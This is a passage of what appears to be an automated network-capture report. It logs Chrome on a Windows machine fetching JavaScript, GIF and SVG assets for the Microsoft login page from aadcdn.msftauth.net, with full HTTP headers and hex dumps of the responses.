                                                                                                                                          Data Ascii: exports=function(t,e){if(a&&"string"==typeof t&&!o.prepareStackTrace)for(;e--;)t=i(t,u,"");return t}},function(t,e,r){"use strict";var n=r(537);t.exports=!n((function(){function t(){}return t.prototype.constructor=null,Object.getPrototypeOf(new t)!==t.pro
                                                                                                                                          2024-11-18 05:47:51 UTC16383INData Raw: 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 3b 65 2e 70 6c 75 67 69 6e 7c 7c 74 68 69 73 2e 6c 61 73 74 50 6c 75 67 69 6e 26 26 74 68 69 73 2e 6c 61 73 74 50 6c 75 67 69 6e 2e 70 6f 73 74 63 73 73 50 6c 75 67 69 6e 26 26 28 65 2e 70 6c 75 67 69 6e 3d 74 68 69 73 2e 6c 61 73 74 50 6c 75 67 69 6e 2e 70 6f 73 74 63 73 73 50 6c 75 67 69 6e 29 3b 76 61 72 20 72 3d 6e 65 77 20 73 28 74 2c 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 65 73 73 61 67 65 73 2e 70 75 73 68 28 72 29 2c 72 7d 7d 2c 7b 6b 65 79 3a 22 77 61 72 6e 69 6e 67 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 65 73 73 61 67 65 73 2e 66 69 6c 74 65 72 28 28 66 75
                                                                                                                                          Data Ascii: &arguments[1]!==undefined?arguments[1]:{};e.plugin||this.lastPlugin&&this.lastPlugin.postcssPlugin&&(e.plugin=this.lastPlugin.postcssPlugin);var r=new s(t,e);return this.messages.push(r),r}},{key:"warnings",value:function(){return this.messages.filter((fu


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          45192.168.2.1655171152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:50 UTC622OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:50 UTC749INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 7949889
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: betEqf4nMmbvq8MhS5mLoA==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:50 GMT
                                                                                                                                          Etag: 0x8DCBD52F3A242D0
                                                                                                                                          Last-Modified: Thu, 15 Aug 2024 17:51:55 GMT
                                                                                                                                          Server: ECAcc (lhc/7941)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: bbd0cf2c-501e-006f-482f-f15e3d000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 15755
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:50 UTC15755INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          46192.168.2.1655172152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:50 UTC670OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:50 UTC716INHTTP/1.1 200 OK
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20650097
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: Fm3lNHEmUlOrOkVt7+baIw==
                                                                                                                                          Content-Type: image/gif
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:50 GMT
                                                                                                                                          Etag: 0x8DB5C3F4982FD30
                                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                          Server: ECAcc (lhc/7945)
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: c8ea465c-601e-0025-11ad-7d4c1f000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 2672
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:50 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                                                                                                          Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          47192.168.2.1655173152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:50 UTC664OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:50 UTC716INHTTP/1.1 200 OK
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20650275
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: tUCo5RgDcZLjLE/li/Lbqw==
                                                                                                                                          Content-Type: image/gif
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:50 GMT
                                                                                                                                          Etag: 0x8DB5C3F492F3EE5
                                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                          Server: ECAcc (lhc/7941)
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 1d63faa2-d01e-009e-5cad-7d1f4c000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 3620
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:50 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                                                                                          Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          48192.168.2.1655175152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:51 UTC419OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:52 UTC716INHTTP/1.1 200 OK
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20650277
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: tUCo5RgDcZLjLE/li/Lbqw==
                                                                                                                                          Content-Type: image/gif
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:52 GMT
                                                                                                                                          Etag: 0x8DB5C3F492F3EE5
                                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                          Server: ECAcc (lhc/7941)
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 1d63faa2-d01e-009e-5cad-7d1f4c000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 3620
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:52 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                                                                                          Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          49192.168.2.1655174152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:51 UTC425OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:52 UTC716INHTTP/1.1 200 OK
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20650099
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: Fm3lNHEmUlOrOkVt7+baIw==
                                                                                                                                          Content-Type: image/gif
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:52 GMT
                                                                                                                                          Etag: 0x8DB5C3F4982FD30
                                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                          Server: ECAcc (lhc/7945)
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: c8ea465c-601e-0025-11ad-7d4c1f000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 2672
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:52 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                                                                                                          Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          50192.168.2.1655176152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:52 UTC437OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:52 UTC749INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 7949891
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: betEqf4nMmbvq8MhS5mLoA==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:52 GMT
                                                                                                                                          Etag: 0x8DCBD52F3A242D0
                                                                                                                                          Last-Modified: Thu, 15 Aug 2024 17:51:55 GMT
                                                                                                                                          Server: ECAcc (lhc/7941)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: bbd0cf2c-501e-006f-482f-f15e3d000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 15755
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:52 UTC15755INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          51192.168.2.1655178152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:52 UTC664OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:52 UTC738INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20649955
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:52 GMT
                                                                                                                                          Etag: 0x8DB5C3F466DE917
                                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:43 GMT
                                                                                                                                          Server: ECAcc (lhc/792B)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 60ece416-101e-0092-59ad-7deb55000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 1864
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:52 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          52192.168.2.1655177152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:52 UTC665OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:52 UTC738INHTTP/1.1 200 OK
